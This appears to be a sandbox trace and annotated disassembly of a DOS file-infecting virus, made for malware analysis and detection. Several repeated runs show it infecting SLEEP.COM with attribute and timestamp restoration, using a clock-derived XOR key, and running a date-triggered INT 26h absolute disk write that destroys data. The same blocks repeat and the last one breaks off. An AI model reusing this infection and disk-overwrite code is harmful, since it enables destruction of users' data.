0x12b70: je 0x12b75  ; date matches -> 0x12b75
0x12b72: jmp 0x12d8c  ; otherwise -> 0x12d8c (outside this window); the next traced calls are the chdir at 12d97/12d9e
0x12b75: jmp 0x12d21  ; 6 June branch; code at 0x12d21 is not shown, presumably a date-triggered payload - confirm
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 sits behind two unconditional jumps; likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; encodes as 00 55 8B; with the next byte (EC) that contains 55 8B EC = push bp / mov bp, sp
0x12b83: in al, dx  ; so the real routine presumably starts at 0x12b81 - confirm against the raw bytes
0x12b84: sub sp, 0x2c  ; reserves 0x2c bytes of stack locals
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the stack buffer reserved above
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = search spec at 0x1b5 + word at DS:0x106; the INT 21h is past the end of the window
2018-12-25T12:39:33.81856292Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:33.823910141Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:32.387558646Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-25T12:39:32.394788707Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:32.397875856Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:32.402112859Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:32.403203971Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:32.409804162Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:32.4167724Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:32.423661489Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; resumes after INT 21h AH=2Ch (op 44 = 0x2C): DH = seconds, DL = hundredths; DL += DH
0x12c8a: je 0x12c84  ; sum is zero -> back to 0x12c84 (before this window; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106; presumably a per-host base offset - confirm
0x12c93: mov byte ptr [si], dl  ; stores the clock-derived byte; presumably the per-copy XOR key - confirm
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 clears read-only/hidden/system so the target can be opened for writing
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = path at SI + 0xc7
0x12ca0: int 0x21  ; traced below as op 67 at PC 12ca2
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21  ; traced below as op 62 at PC 12ca6
0x12ca6: mov ax, 0x3d02  ; AX=3D02h: open, access mode 2 = read/write
0x12ca9: int 0x21  ; traced below as op 61 at PC 12cab
0x12cab: jb 0x12c5e  ; CF set = open failed -> 0x12c5e (outside this window)
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to file; the INT 21h itself is past the end of the window
; Behavioural signature for detection: clear attributes -> reopen read/write -> writes -> restore file date/time (op 87) and attributes (op 67), as the following rows show.
2018-12-25T12:39:32.426340681Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.375635378Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:33.377228769Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.385621262Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.393627889Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.397056464Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.401716971Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:33.403291367Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.406063293Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.591854007Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.594392076Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.596323946Z 62 PC: 12d0b | Close file
2018-12-25T12:39:33.617165222Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.633175074Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:33.63634849Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.643772046Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.651565139Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.653929771Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.671606542Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.674626763Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.682079558Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.685367175Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.68875668Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.690640341Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.69214284Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.694855482Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.707574115Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.709742865Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.71977368Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.731652583Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.742581089Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:33.746051903Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.753711136Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.761920929Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.765094237Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.778313055Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.78107348Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.789000416Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.793032673Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.795908996Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.798774091Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.800995151Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.803458012Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.813238453Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.816679333Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.819414896Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.828434557Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.84020446Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; resumes after INT 21h AH=2Ah: DH = month, DL = day, so 0x0606 = 6 June
0x12b70: je 0x12b75  ; date matches -> 0x12b75
0x12b72: jmp 0x12d8c  ; otherwise -> 0x12d8c (outside this window); the next traced calls are the chdir at 12d97/12d9e
0x12b75: jmp 0x12d21  ; 6 June branch; code at 0x12d21 is not shown, presumably a date-triggered payload - confirm
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 sits behind two unconditional jumps; likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; encodes as 00 55 8B; with the next byte (EC) that contains 55 8B EC = push bp / mov bp, sp
0x12b83: in al, dx  ; so the real routine presumably starts at 0x12b81 - confirm against the raw bytes
0x12b84: sub sp, 0x2c  ; reserves 0x2c bytes of stack locals
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the stack buffer reserved above
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = search spec at 0x1b5 + word at DS:0x106; the INT 21h is past the end of the window
2018-12-25T12:39:33.843682521Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:33.84818401Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:33.186120247Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-25T12:39:33.189066842Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:33.192003603Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:33.19603326Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.198065191Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:33.204017897Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.210503599Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.217669848Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; resumes after INT 21h AH=2Ch (op 44 = 0x2C): DH = seconds, DL = hundredths; DL += DH
0x12c8a: je 0x12c84  ; sum is zero -> back to 0x12c84 (before this window; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106; presumably a per-host base offset - confirm
0x12c93: mov byte ptr [si], dl  ; stores the clock-derived byte; presumably the per-copy XOR key - confirm
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 clears read-only/hidden/system so the target can be opened for writing
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = path at SI + 0xc7
0x12ca0: int 0x21  ; traced below as op 67 at PC 12ca2
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21  ; traced below as op 62 at PC 12ca6
0x12ca6: mov ax, 0x3d02  ; AX=3D02h: open, access mode 2 = read/write
0x12ca9: int 0x21  ; traced below as op 61 at PC 12cab
0x12cab: jb 0x12c5e  ; CF set = open failed -> 0x12c5e (outside this window)
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to file; the INT 21h itself is past the end of the window
; Behavioural signature for detection: clear attributes -> reopen read/write -> writes -> restore file date/time (op 87) and attributes (op 67), as the following rows show.
2018-12-25T12:39:33.220161461Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.838813657Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:33.840748107Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.852985555Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.865207713Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.868149727Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.87161872Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:33.872963043Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.875140216Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.902781159Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.905281608Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.906822506Z 62 PC: 12d0b | Close file
2018-12-25T12:39:33.915450013Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.922361149Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:33.924526948Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.929133026Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.933924218Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.935638403Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.94317348Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.946366634Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.953275238Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.956912906Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.959637127Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.96233446Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.964677303Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.967346396Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.978673802Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.991320666Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.994337752Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.002505193Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.013634568Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:34.023265365Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:34.02990689Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:34.036196031Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:34.038993651Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:34.050487227Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:34.052467636Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:34.060027308Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:34.062993737Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:34.0654043Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:34.068374949Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:34.069718661Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.072489851Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:34.084850614Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:34.087481391Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:34.089155882Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:34.10411338Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:34.115379362Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606  ; resumes after INT 21h AH=2Ah: DH = month, DL = day, so 0x0606 = 6 June
0x12b70: je 0x12b75  ; date matches -> 0x12b75
0x12b72: jmp 0x12d8c  ; otherwise -> 0x12d8c (outside this window); the next traced calls are the chdir at 12d97/12d9e
0x12b75: jmp 0x12d21  ; 6 June branch; code at 0x12d21 is not shown, presumably a date-triggered payload - confirm
0x12b78: and ah, bh  ; NOTE(review): 0x12b78-0x12b83 sits behind two unconditional jumps; likely data or a misaligned decode
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl  ; encodes as 00 55 8B; with the next byte (EC) that contains 55 8B EC = push bp / mov bp, sp
0x12b83: in al, dx  ; so the real routine presumably starts at 0x12b81 - confirm against the raw bytes
0x12b84: sub sp, 0x2c  ; reserves 0x2c bytes of stack locals
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a  ; AH=1Ah: set disk transfer address
0x12b8c: lea dx, word ptr [bp - 0x2c]  ; DTA = the stack buffer reserved above
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e  ; AH=4Eh: find first
0x12b93: mov cx, 0x10  ; attribute mask 0x10 = directory
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]  ; DS:DX = search spec at 0x1b5 + word at DS:0x106; the INT 21h is past the end of the window
2018-12-25T12:39:34.117912915Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:34.123174767Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:33.559854456Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2  ; resumes after INT 21h AH=2Ah (op 42 = 0x2A), which returns DL = day of month
0x12a5d: je 0x12a61  ; day == 2 -> raw disk-write path below
0x12a5f: jmp 0x12a7e  ; any other day -> ret, nothing written
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq  ; NOTE(review): one-byte opcode; in 16-bit code this would normally decode as CWD (DX = sign of AX, i.e. 0 with AH = 2) - confirm disassembler mode
0x12a65: mov cx, 0x100  ; sector count = 0x100 (256)
0x12a68: int 0x26  ; INT 26h = DOS absolute disk write (AL = drive, CX = sectors, DX = first sector, DS:BX = buffer): date-triggered destructive payload
; Triage note: the rows visible in this table are all INT 21h functions, so this INT 26h would presumably not be listed even when taken - confirm with the sandbox.
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3  ; as an INT 26h drive number, 3 = D: (0 = A:)
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]  ; DS and BX reloaded from the words at [di+0x63] and [di+0x37]
0x12a7b: call 0x22a61  ; NOTE(review): target printed without 16-bit IP wraparound; presumably 0x12a61, i.e. back into the INT 26h sequence - confirm
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]  ; a separate routine starts after the ret: AL = byte at [SI]
0x12a80: xor al, ah  ; XOR with the key byte held in AH
0x12a82: stosb byte ptr es:[di], al  ; store to ES:[DI]; presumably the XOR en/decryption loop of the body, loop instruction is outside this window
2018-12-25T12:39:33.563553568Z 71 PC: 12b46 | Get current directory
2018-12-25T12:39:33.566813048Z 59 PC: 12b51 | Change current directory
2018-12-25T12:39:33.571734392Z 26 PC: 12c04 | Set disk transfer address
2018-12-25T12:39:33.573482765Z 78 PC: 12c12 | Find first file
2018-12-25T12:39:33.594830922Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.608447263Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:33.615704318Z 44 PC: 12c88 | Get time 0x12c88: add dl, dh  ; resumes after INT 21h AH=2Ch (op 44 = 0x2C): DH = seconds, DL = hundredths; DL += DH
0x12c8a: je 0x12c84  ; sum is zero -> back to 0x12c84 (before this window; presumably re-reads the clock)
0x12c8c: mov si, 0x115
0x12c8f: add si, word ptr [0x106]  ; SI = 0x115 + word at DS:0x106; presumably a per-host base offset - confirm
0x12c93: mov byte ptr [si], dl  ; stores the clock-derived byte; presumably the per-copy XOR key - confirm
0x12c95: mov ax, 0x4301  ; INT 21h AX=4301h: set file attributes
0x12c98: xor cx, cx  ; CX = 0 clears read-only/hidden/system so the target can be opened for writing
0x12c9a: mov dx, si
0x12c9c: add dx, 0xc7  ; DS:DX = path at SI + 0xc7
0x12ca0: int 0x21  ; traced below as op 67 at PC 12ca2
0x12ca2: mov ah, 0x3e  ; AH=3Eh: close the handle in BX
0x12ca4: int 0x21  ; traced below as op 62 at PC 12ca6
0x12ca6: mov ax, 0x3d02  ; AX=3D02h: open, access mode 2 = read/write
0x12ca9: int 0x21  ; traced below as op 61 at PC 12cab
0x12cab: jb 0x12c5e  ; CF set = open failed -> 0x12c5e (outside this window)
0x12cad: mov di, dx
0x12caf: add di, 0x63
0x12cb2: stosw word ptr es:[di], ax  ; saves the new handle (AX) at ES:[DX + 0x63]
0x12cb3: xchg ax, bx  ; BX = handle for the calls that follow
0x12cb4: mov ah, 0x40  ; AH=40h: write to file; the INT 21h itself is past the end of the window
; Behavioural signature for detection: clear attributes -> reopen read/write -> writes -> restore file date/time (op 87) and attributes (op 67), as the following rows show.
2018-12-25T12:39:33.619279468Z 67 PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:33.732240892Z 62 PC: 12ca6 | Close file
2018-12-25T12:39:33.734682249Z 61 PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:33.742785373Z 64 PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:33.745929747Z 64 PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.748929016Z 64 PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:33.752514498Z 66 PC: 12cee | Move file pointer
2018-12-25T12:39:33.753956071Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.756549181Z 64 PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:33.766962277Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.769666847Z 87 PC: 12d07 | Get or set file date and time
2018-12-25T12:39:33.771602658Z 62 PC: 12d0b | Close file
2018-12-25T12:39:33.781357942Z 67 PC: 12d1c | Get or set file attributes
2018-12-25T12:39:33.791165777Z 79 PC: 12c25 | Find next file
2018-12-25T12:39:33.794033225Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.798634173Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.803663921Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.805657196Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.817276815Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.820192874Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.828267577Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.831213973Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.835368638Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.838777783Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.84168177Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.845114955Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.852078229Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.854834784Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.857558709Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.866746389Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.880108253Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:39:33.883634614Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:39:33.891277238Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:33.898402197Z 44 PC: 12c88 | Get time (See above)
2018-12-25T12:39:33.900840753Z 67 PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:33.912432591Z 62 PC: 12ca6 | Close file (See above)
2018-12-25T12:39:33.914229379Z 61 PC: 12cab | Open file (See above)
2018-12-25T12:39:33.921449267Z 64 PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:33.924523232Z 64 PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:33.927372402Z 64 PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:33.930211136Z 66 PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:33.93203345Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.934320188Z 64 PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:33.943477045Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:39:33.946661278Z 87 PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:33.948704233Z 62 PC: 12d0b | Close file (See above)
2018-12-25T12:39:33.957340393Z 67 PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:33.969290711Z 42 PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606
0x12b70: je 0x12b75
0x12b72: jmp 0x12d8c
0x12b75: jmp 0x12d21
0x12b78: and ah, bh
0x12b7a: movsw word ptr es:[di], word ptr [si]
0x12b7b: mov ax, 0x5c4c
0x12b7e: add word ptr [di], ax
0x12b80: add byte ptr [di - 0x75], dl
0x12b83: in al, dx
0x12b84: sub sp, 0x2c
0x12b87: push si
0x12b88: jmp 0x12bf9
0x12b8a: mov ah, 0x1a
0x12b8c: lea dx, word ptr [bp - 0x2c]
0x12b8f: int 0x21
0x12b91: mov ah, 0x4e
0x12b93: mov cx, 0x10
0x12b96: mov dx, 0x1b5
0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:33.972247624Z 59 PC: 12d97 | Change current directory
2018-12-25T12:39:33.978164939Z 59 PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:33.779393801Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a61
0x12a5f: jmp 0x12a7e
0x12a61: cli
0x12a62: mov ah, 2
0x12a64: cdq
0x12a65: mov cx, 0x100
0x12a68: int 0x26
0x12a6a: jmp 0x12a6c
0x12a6c: cli
0x12a6d: mov al, 3
0x12a6f: mov cx, 0x2bc
0x12a72: mov dx, 0
0x12a75: mov ds, word ptr [di + 0x63]
0x12a78: mov bx, word ptr [di + 0x37]
0x12a7b: call 0x22a61
0x12a7e: ret
0x12a7f: lodsb al, byte ptr [si]
0x12a80: xor al, ah
